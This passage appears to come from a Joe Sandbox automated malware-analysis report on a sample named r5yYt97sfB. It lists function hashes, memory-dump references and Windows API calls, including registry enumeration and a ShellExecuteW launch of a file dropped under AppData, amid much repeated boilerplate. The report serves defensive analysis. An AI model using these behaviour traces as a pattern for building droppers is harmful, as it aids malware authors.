Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44

Function 00406E7D Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45

Function 00406B93 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45

Function 00406698 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45

Function 00406AE6 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44

Function 00406C04 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45

Function 00406B50 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E

Function 004021EA Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD

lstrlenW.KERNEL32 ref: 0040222A
lstrlenW.KERNEL32(00000000), ref: 00402235
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?), ref: 00401E52

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00401E3B

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto
API String ID: 587946157-576767988
Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618

Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseOpenQueryValue
